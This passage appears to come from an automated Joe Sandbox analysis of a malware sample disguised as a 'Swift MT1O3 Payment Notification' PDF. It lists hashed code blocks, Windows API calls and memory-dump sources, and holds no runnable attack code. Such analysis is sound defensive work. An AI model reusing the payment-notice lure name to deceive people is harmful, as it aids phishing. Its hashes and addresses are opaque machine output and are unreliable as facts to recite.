                                                                                                                              • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                              • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                                                                                                                              • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                                                                                                                              • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                                                                                                                              APIs
                                                                                                                              • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                                                                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                                                                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                                                                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2833360925-0
                                                                                                                              • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                              • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                                                                                                                              • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                                                                                                                              • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32 ref: 004555C7
                                                                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                              • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                              • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                              • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3691411573-0
                                                                                                                              • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                              • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                                                                                                                              • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                                                                                                                              • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                                                                                                                              • LineTo.GDI32(?,?,?), ref: 004472AC
                                                                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                                                                                                                              • LineTo.GDI32(?,?,?), ref: 004472C6
                                                                                                                              • EndPath.GDI32(?), ref: 004472D6
                                                                                                                              • StrokePath.GDI32(?), ref: 004472E4
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 372113273-0
                                                                                                                              • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                              • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                                                                                                                              • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                                                                                                                              • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                                                                                                                              APIs
                                                                                                                              • GetDC.USER32(00000000), ref: 0044CC6D
                                                                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                                                                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                                                                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                                                                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1035833867-0
                                                                                                                              • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                              • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                                                                                                                              • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                                                                                                                              • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                                                                                                                              APIs
                                                                                                                              • InterlockedExchange.KERNEL32(?,?), ref: 0044B655
                                                                                                                              • EnterCriticalSection.KERNEL32(?), ref: 0044B666
                                                                                                                              • TerminateThread.KERNEL32(?,000001F6), ref: 0044B674
                                                                                                                              • WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B682
                                                                                                                                • Part of subcall function 00432614: CloseHandle.KERNEL32(00000000,00000000,?,0044B68E,00000000,?,000003E8,?,000001F6), ref: 00432622
                                                                                                                              • InterlockedExchange.KERNEL32(?,000001F6), ref: 0044B697
                                                                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 0044B69E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3495660284-0
                                                                                                                              • Opcode ID: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                              • Instruction ID: c0d5b59c8b9084ef0a5212f46b36de0b3fb5a8468090cd03c061fc2099eb7203
                                                                                                                              • Opcode Fuzzy Hash: 80b6dccbd1e5d9cd8e45b8a26e63ab1859993381d971fdb3943588aa16a91346
                                                                                                                              • Instruction Fuzzy Hash: A8F0AF72141201BBD210AB64EE8CDAFB77CFF88311F40092AFA0192560CBB4E420CBB6
                                                                                                                              APIs
                                                                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00410AE8
                                                                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410AF0
                                                                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00410AFB
                                                                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00410B06
                                                                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 00410B0E
                                                                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 00410B16
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Virtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4278518827-0
                                                                                                                              • Opcode ID: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                              • Instruction ID: ec5b0e47a8727e2ef01e8325cfcf1e1c5a721ad9102a6d662b709b351e7b749c
                                                                                                                              • Opcode Fuzzy Hash: c23d3b718cf4e8061cd741903dec6eccba5b4b0418601ad509713896de31bf0c
                                                                                                                              • Instruction Fuzzy Hash: 79016770106B88ADD3309F668C84B47FFF8EF95704F01491DD1D507A52C6B5A84CCB69
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32 ref: 004781CE
                                                                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00478387
                                                                                                                                • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478270
                                                                                                                              • SetErrorMode.KERNEL32(?), ref: 00478340
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ErrorMode$AttributesFile
                                                                                                                              • String ID: \VH
                                                                                                                              • API String ID: 751036072-234962358
                                                                                                                              • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                              • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                              • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                              • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                              APIs
                                                                                                                              • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                              • IsMenu.USER32(?), ref: 0044854D
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                              • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$Item$DrawInfoInsert
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 3076010158-4108050209
                                                                                                                              • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                              • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                              • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                              • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                              • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                              • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 3850602802-1403004172
                                                                                                                              • Opcode ID: fc728827ed4e8c9f052804931144db89f52f0bb0832731406d703a6b351985e5
                                                                                                                              • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                              • Opcode Fuzzy Hash: fc728827ed4e8c9f052804931144db89f52f0bb0832731406d703a6b351985e5
                                                                                                                              • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                              APIs
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle
                                                                                                                              • String ID: nul
                                                                                                                              • API String ID: 2519475695-2873401336
                                                                                                                              • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                              • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                              • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                              • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Handle
                                                                                                                              • String ID: nul
                                                                                                                              • API String ID: 2519475695-2873401336
                                                                                                                              • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                              • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                              • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                              • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: SysAnimate32
                                                                                                                              • API String ID: 0-1011021900
                                                                                                                              • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                              • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                              • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                              • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                              APIs
                                                                                                                              • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                              • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                              • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.909109640.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.909057972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909365210.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909423542.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909476912.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909533313.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.909656822.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_400000_Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateDirectory$AttributesErrorFileLast
                                                                                                                              • String ID: \
                                                                                                                              • API String ID: 2267087916-2967466578
                                                                                                                              • Opcode ID: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                                                                                                              • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                              • Opcode Fuzzy Hash: 5b7cbb580858ec080c0b934fadd4bd42aa741e6ee90efb2d39035bace6cc2b79
                                                                                                                              • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0045D459
